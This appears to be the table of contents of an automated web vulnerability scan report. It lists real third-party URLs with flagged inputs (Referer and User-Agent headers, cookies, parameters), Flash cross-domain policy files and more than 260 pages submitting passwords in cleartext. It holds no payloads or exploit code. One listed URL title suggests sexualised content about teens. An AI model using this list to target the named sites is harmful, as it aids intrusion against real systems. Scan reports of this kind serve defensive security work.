4.1949. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header]

4.1950. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header]

4.1951. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header]

4.1952. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header]

4.1953. http://www.autobytel.com/my-garage.htm [Referer HTTP header]

4.1954. http://www.autobytel.com/my-garage.htm [Referer HTTP header]

4.1955. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header]

4.1956. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header]

4.1957. http://www.autobytel.com/new-cars.htm [Referer HTTP header]

4.1958. http://www.autobytel.com/new-cars.htm [Referer HTTP header]

4.1959. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header]

4.1960. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [Referer HTTP header]

4.1961. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header]

4.1962. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header]

4.1963. http://www.autobytel.com/used-cars.htm [Referer HTTP header]

4.1964. http://www.autobytel.com/used-cars.htm [Referer HTTP header]

4.1965. http://www.autobytel.com/x22 [Referer HTTP header]

4.1966. http://www.autobytel.com/x22 [Referer HTTP header]

4.1967. http://www.flashedition.com/publication [Referer HTTP header]

4.1968. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [Referer HTTP header]

4.1969. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header]

4.1970. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header]

4.1971. http://www.rochenhost.com/ [User-Agent HTTP header]

4.1972. http://www.rochenhost.com/joomla-hosting [User-Agent HTTP header]

4.1973. http://www.traderpub.com/x22 [Referer HTTP header]

4.1974. http://www.washington.edu/alpinef972a

4.1975. http://www.washington.edu/alpinef972a

4.1976. http://www.washington.edu/alpinef972a

4.1977. http://www.washington.edu/alpinef972a

4.1978. http://www.washington.edu/alpinef972a

4.1979. http://www.washington.edu/alpinef972a

4.1980. http://www.washington.edu/alpinef972a

4.1981. http://www.washington.edu/alpinef972a

4.1982. http://www.washington.edu/alpinef972a

4.1983. http://www.washington.edu/alpinef972a

4.1984. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

4.1985. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

4.1986. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header]

4.1987. http://www.washington.edu/alpinef972a

4.1988. http://www.washington.edu/alpinef972a

4.1989. http://www.washington.edu/alpinef972a

4.1990. http://www.washington.edu/alpinef972a

4.1991. http://www.washington.edu/alpinef972a

4.1992. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

4.1993. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header]

4.1994. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header]

4.1995. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header]

4.1996. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header]

4.1997. http://newsguy.com/user_info.asp [DIGEST cookie]

4.1998. http://www.autobytel.com/ [BDATALIST cookie]

4.1999. http://www.autobytel.com/ [ENTERED_POSTAL_CODE_VCH cookie]

4.2000. http://www.autobytel.com/ [PV_CT cookie]

4.2001. http://www.autobytel.com/a.cfml [BDATALIST cookie]

4.2002. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [BDATALIST cookie]

4.2003. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2004. http://www.autobytel.com/auto-insurance-quotes.htm [BDATALIST cookie]

4.2005. http://www.autobytel.com/auto-insurance-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2006. http://www.autobytel.com/car-advice.htm [BDATALIST cookie]

4.2007. http://www.autobytel.com/car-advice.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2008. http://www.autobytel.com/car-blog.htm [BDATALIST cookie]

4.2009. http://www.autobytel.com/car-blog.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2010. http://www.autobytel.com/car-dealers.htm [BDATALIST cookie]

4.2011. http://www.autobytel.com/car-dealers.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2012. http://www.autobytel.com/car-financing.htm [BDATALIST cookie]

4.2013. http://www.autobytel.com/car-financing.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2014. http://www.autobytel.com/car-incentives.htm [BDATALIST cookie]

4.2015. http://www.autobytel.com/car-incentives.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2016. http://www.autobytel.com/car-news.htm [BDATALIST cookie]

4.2017. http://www.autobytel.com/car-news.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2018. http://www.autobytel.com/car-pictures.htm [BDATALIST cookie]

4.2019. http://www.autobytel.com/car-pictures.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2020. http://www.autobytel.com/car-reviews.htm [BDATALIST cookie]

4.2021. http://www.autobytel.com/car-reviews.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2022. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [BDATALIST cookie]

4.2023. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [ENTERED_POSTAL_CODE_VCH cookie]

4.2024. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [PV_CT cookie]

4.2025. http://www.autobytel.com/content/buy/index.cfm [BDATALIST cookie]

4.2026. http://www.autobytel.com/content/buy/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2027. http://www.autobytel.com/content/buy/index.cfm [PV_CT cookie]

4.2028. http://www.autobytel.com/content/buy/warranty/index.cfm [BDATALIST cookie]

4.2029. http://www.autobytel.com/content/buy/warranty/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2030. http://www.autobytel.com/content/buy/warranty/index.cfm [PV_CT cookie]

4.2031. http://www.autobytel.com/content/home/help/index.cfm [BDATALIST cookie]

4.2032. http://www.autobytel.com/content/home/help/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2033. http://www.autobytel.com/content/home/help/index.cfm [PV_CT cookie]

4.2034. http://www.autobytel.com/content/home/help/index.cfm/action/about [BDATALIST cookie]

4.2035. http://www.autobytel.com/content/home/help/index.cfm/action/about [ENTERED_POSTAL_CODE_VCH cookie]

4.2036. http://www.autobytel.com/content/home/help/index.cfm/action/about [PV_CT cookie]

4.2037. http://www.autobytel.com/content/home/help/index.cfm/action/contact [BDATALIST cookie]

4.2038. http://www.autobytel.com/content/home/help/index.cfm/action/contact [ENTERED_POSTAL_CODE_VCH cookie]

4.2039. http://www.autobytel.com/content/home/help/index.cfm/action/contact [PV_CT cookie]

4.2040. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [BDATALIST cookie]

4.2041. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [ENTERED_POSTAL_CODE_VCH cookie]

4.2042. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [PV_CT cookie]

4.2043. http://www.autobytel.com/content/home/help/index.cfm/action/terms [BDATALIST cookie]

4.2044. http://www.autobytel.com/content/home/help/index.cfm/action/terms [ENTERED_POSTAL_CODE_VCH cookie]

4.2045. http://www.autobytel.com/content/home/help/index.cfm/action/terms [PV_CT cookie]

4.2046. http://www.autobytel.com/content/home/index.cfm [BDATALIST cookie]

4.2047. http://www.autobytel.com/content/home/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2048. http://www.autobytel.com/content/home/index.cfm [PV_CT cookie]

4.2049. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [BDATALIST cookie]

4.2050. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [ENTERED_POSTAL_CODE_VCH cookie]

4.2051. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [PV_CT cookie]

4.2052. http://www.autobytel.com/content/research/article/index.cfm [BDATALIST cookie]

4.2053. http://www.autobytel.com/content/research/article/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2054. http://www.autobytel.com/content/research/article/index.cfm [PV_CT cookie]

4.2055. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [BDATALIST cookie]

4.2056. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [ENTERED_POSTAL_CODE_VCH cookie]

4.2057. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [PV_CT cookie]

4.2058. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [BDATALIST cookie]

4.2059. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [ENTERED_POSTAL_CODE_VCH cookie]

4.2060. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [PV_CT cookie]

4.2061. http://www.autobytel.com/content/research/comparison/index.cfm [BDATALIST cookie]

4.2062. http://www.autobytel.com/content/research/comparison/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2063. http://www.autobytel.com/content/research/comparison/index.cfm [PV_CT cookie]

4.2064. http://www.autobytel.com/content/research/index.cfm [BDATALIST cookie]

4.2065. http://www.autobytel.com/content/research/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2066. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [BDATALIST cookie]

4.2067. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [ENTERED_POSTAL_CODE_VCH cookie]

4.2068. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [PV_CT cookie]

4.2069. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [BDATALIST cookie]

4.2070. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [ENTERED_POSTAL_CODE_VCH cookie]

4.2071. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [PV_CT cookie]

4.2072. http://www.autobytel.com/coupons/my-garage.htm [BDATALIST cookie]

4.2073. http://www.autobytel.com/coupons/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2074. http://www.autobytel.com/diagnose-problem/my-garage.htm [BDATALIST cookie]

4.2075. http://www.autobytel.com/diagnose-problem/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2076. http://www.autobytel.com/my-garage.htm [BDATALIST cookie]

4.2077. http://www.autobytel.com/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2078. http://www.autobytel.com/new-car-price-quotes.htm [BDATALIST cookie]

4.2079. http://www.autobytel.com/new-car-price-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2080. http://www.autobytel.com/new-cars.htm [BDATALIST cookie]

4.2081. http://www.autobytel.com/new-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2082. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [BDATALIST cookie]

4.2083. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2084. http://www.autobytel.com/sitemap/index.cfm [BDATALIST cookie]

4.2085. http://www.autobytel.com/sitemap/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

4.2086. http://www.autobytel.com/sitemap/index.cfm [PV_CT cookie]

4.2087. http://www.autobytel.com/used-cars.htm [BDATALIST cookie]

4.2088. http://www.autobytel.com/used-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]

4.2089. http://www.autobytel.com/x22 [BDATALIST cookie]

4.2090. http://www.autotrader.com/ [JSESSIONID cookie]

4.2091. http://www.newsvine.com/_wine/save [u parameter]

4.2092. http://www.newsvine.com/_wine/save [u parameter]

4.2093. http://www.payloadmagazine.com/ [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://ads.doclix.com/crossdomain.xml

5.2. http://www.youtube.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://community.joomla.org/login.html

6.2. http://community.joomla.org/showcase/

6.3. http://community.joomla.org/showcase/how-to-submit-a-site.html

6.4. http://community.joomla.org/showcase/sites-of-the-month.html

6.5. http://community.joomla.org/showcase/sites/advsearch.html

6.6. http://community.joomla.org/showcase/sites/new.html

6.7. http://community.joomla.org/user-groups.html

6.8. http://demo16.cloudaccess.net/

6.9. http://demo16.cloudaccess.net/administrator/index.php

6.10. http://docs.joomla.org/index.php

6.11. http://extensions.joomla.org/

6.12. http://extensions.joomla.org/extensions

6.13. http://extensions.joomla.org/extensions/advanced-search

6.14. http://extensions.joomla.org/extensions/languages/translations-for-joomla

6.15. http://extensions.joomla.org/extensions/new

6.16. http://fastdial.com/

6.17. http://fastdial.com/0

6.18. http://fastdial.com/user

6.19. http://fastdial.com/website

6.20. http://fastdial.com/welcome-fast-dial-firefox-4

6.21. http://forum.joomla.org/

6.22. http://forum.joomla.org/ucp.php

6.23. http://forum.joomla.org/viewforum.php

6.24. http://forumas.lithuanianjoomla.com/

6.25. http://forums.freebsd.org/

6.26. http://help.tweetmeme.com/

6.27. http://help.tweetmeme.com/2009/04/07/api-documentation/

6.28. http://help.tweetmeme.com/2009/04/09/rss-feeds/

6.29. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

6.30. http://help.tweetmeme.com/contact/

6.31. http://help.tweetmeme.com/forum/forum/33

6.32. http://help.tweetmeme.com/language/

6.33. http://it.toolbox.com/blogs/database-soup

6.34. http://it.toolbox.com/blogs/database-talk

6.35. http://it.toolbox.com/blogs/db2luw

6.36. http://it.toolbox.com/blogs/db2zos

6.37. http://it.toolbox.com/blogs/elsua

6.38. http://it.toolbox.com/blogs/juice-analytics

6.39. http://it.toolbox.com/blogs/minimalit

6.40. http://it.toolbox.com/blogs/penguinista-databasiensis

6.41. http://it.toolbox.com/blogs/ppmtoday

6.42. http://joomlacode.org/gf/account/

6.43. http://my.joomla.org/

6.44. http://netvouz.com/action/submitBookmark

6.45. http://newsguy.com/

6.46. http://people.joomla.org/

6.47. http://people.joomla.org/

6.48. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

6.49. http://resources.joomla.org/

6.50. http://resources.joomla.org/directory/advsearch.html

6.51. http://resources.joomla.org/directory/new.html

6.52. http://resources.joomla.org/how-to-add-listings.html

6.53. http://slashdot.org/bookmark.pl

6.54. http://slashdot.org/bookmark.pl

6.55. http://spongecell.com/event_list

6.56. http://themehybrid.com/

6.57. http://themehybrid.com/themes/shadow

6.58. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu

6.59. http://wordpress.org/extend/plugins/tweetmeme-follow-button/

6.60. http://wordpress.org/extend/plugins/tweetmeme/

6.61. http://wordpress.org/extend/plugins/wp-pagenavi/

6.62. http://www.adside.com/adside/advertiser.html

6.63. http://www.adside.com/adside/publisher.html

6.64. http://www.americascupmedia.com/index.php

6.65. http://www.barkerstores.com/soundings/

6.66. http://www.dynamicdrive.com/forums/showthread.php

6.67. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

6.68. http://www.facebook.com/

6.69. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

6.70. http://www.homes.com/

6.71. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang

6.72. http://www.joomla.org/login.html

6.73. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

6.74. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

6.75. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

6.76. http://www.linkagogo.com/go/AddNoPopup

6.77. http://www.lithuanianjoomla.com/

6.78. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html

6.79. http://www.lithuanianjoomla.com/apie-joomla.html

6.80. http://www.lithuanianjoomla.com/component/users/

6.81. http://www.lithuanianjoomla.com/component/users/

6.82. http://www.lithuanianjoomla.com/index.php

6.83. http://www.lithuanianjoomla.com/joomla-naujienos.html

6.84. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

6.85. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

6.86. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

6.87. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

6.88. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

6.89. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

6.90. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html

6.91. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

6.92. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

6.93. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html

6.94. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

6.95. http://www.lithuanianjoomla.com/joomla-sasajos.html

6.96. http://www.lithuanianjoomla.com/joomla-saugumas.html

6.97. http://www.lithuanianjoomla.com/joomla-versijos.html

6.98. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

6.99. http://www.lithuanianjoomla.com/kontaktai.html

6.100. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

6.101. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

6.102. http://www.lithuanianjoomla.com/naujienos.html

6.103. http://www.lithuanianjoomla.com/saugi-joomla.html

6.104. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

6.105. http://www.livejournal.com/update.bml

6.106. http://www.nbc.com/

6.107. http://www.netlingo.com/login.php

6.108. http://www.netlingo.com/register-premium.php

6.109. http://www.netlingo.com/register.php

6.110. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

6.111. http://www.noreastermagazine.com/

6.112. http://www.paperg.com/

6.113. http://www.playshakespeare.com/

6.114. http://www.regattaregatta.com/

6.115. http://www.rockettheme.com/

6.116. http://www.shape.com/workouts/articles/blood_sugar.html

6.117. http://www.shape.com/workouts/articles/workout_schedule.html

6.118. http://www.svenskjoomla.se/index.php

6.119. http://www.thefeast.com/boston/

6.120. http://www.thefeast.com/boston/

6.121. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

6.122. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

6.123. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

6.124. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

6.125. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

6.126. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

6.127. http://www.usaca.info/

6.128. http://www.w-w-i.com/

6.129. http://www.w-w-i.com/velux_5_oceans_2010_race/

6.130. http://www.woothemes.com/

6.131. http://www.x64bitdownload.com/

6.132. http://www.x64bitdownload.com/64-bit-archive-downloads.html

6.133. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

6.134. http://www.x64bitdownload.com/64-bit-atom-downloads.html

6.135. http://www.x64bitdownload.com/64-bit-audio-downloads.html

6.136. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

6.137. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

6.138. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

6.139. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

6.140. http://www.x64bitdownload.com/64-bit-binary-downloads.html

6.141. http://www.x64bitdownload.com/64-bit-board-downloads.html

6.142. http://www.x64bitdownload.com/64-bit-boards-downloads.html

6.143. http://www.x64bitdownload.com/64-bit-client-downloads.html

6.144. http://www.x64bitdownload.com/64-bit-commander-downloads.html

6.145. http://www.x64bitdownload.com/64-bit-community-downloads.html

6.146. http://www.x64bitdownload.com/64-bit-complex-downloads.html

6.147. http://www.x64bitdownload.com/64-bit-conference-downloads.html

6.148. http://www.x64bitdownload.com/64-bit-cross-downloads.html

6.149. http://www.x64bitdownload.com/64-bit-download-downloads.html

6.150. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

6.151. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

6.152. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

6.153. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

6.154. http://www.x64bitdownload.com/64-bit-feed-downloads.html

6.155. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

6.156. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

6.157. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

6.158. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

6.159. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

6.160. http://www.x64bitdownload.com/64-bit-forum-downloads.html

6.161. http://www.x64bitdownload.com/64-bit-forums-downloads.html

6.162. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

6.163. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

6.164. http://www.x64bitdownload.com/64-bit-group-downloads.html

6.165. http://www.x64bitdownload.com/64-bit-groups-downloads.html

6.166. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

6.167. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

6.168. http://www.x64bitdownload.com/64-bit-images-downloads.html

6.169. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

6.170. http://www.x64bitdownload.com/64-bit-internet-downloads.html

6.171. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

6.172. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

6.173. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

6.174. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

6.175. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

6.176. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

6.177. http://www.x64bitdownload.com/64-bit-news-downloads.html

6.178. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

6.179. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

6.180. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

6.181. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

6.182. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

6.183. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

6.184. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

6.185. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

6.186. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

6.187. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

6.188. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

6.189. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

6.190. http://www.x64bitdownload.com/64-bit-par-downloads.html

6.191. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

6.192. http://www.x64bitdownload.com/64-bit-posts-downloads.html

6.193. http://www.x64bitdownload.com/64-bit-rar-downloads.html

6.194. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

6.195. http://www.x64bitdownload.com/64-bit-reader-downloads.html

6.196. http://www.x64bitdownload.com/64-bit-reading-downloads.html

6.197. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

6.198. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

6.199. http://www.x64bitdownload.com/64-bit-rss-downloads.html

6.200. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

6.201. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

6.202. http://www.x64bitdownload.com/64-bit-search-downloads.html

6.203. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

6.204. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

6.205. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

6.206. http://www.x64bitdownload.com/64-bit-topic-downloads.html

6.207. http://www.x64bitdownload.com/64-bit-troll-downloads.html

6.208. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

6.209. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

6.210. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

6.211. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

6.212. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

6.213. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

6.214. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

6.215. http://www.x64bitdownload.com/64-bit-video-downloads.html

6.216. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

6.217. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

6.218. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html

6.219. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

6.220. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

6.221. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

6.222. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

6.223. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

6.224. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

6.225. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

6.226. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

6.227. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

6.228. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

6.229. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

6.230. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

6.231. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

6.232. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

6.233. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

6.234. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

6.235. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

6.236. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

6.237. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

6.238. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

6.239. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

6.240. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

6.241. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

6.242. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

6.243. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

6.244. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

6.245. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

6.246. http://www.x64bitdownload.com/contact.html

6.247. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html

6.248. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html

6.249. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

6.250. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

6.251. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

6.252. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

6.253. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html

6.254. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

6.255. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

6.256. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

6.257. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html

6.258. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

6.259. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

6.260. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

6.261. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html

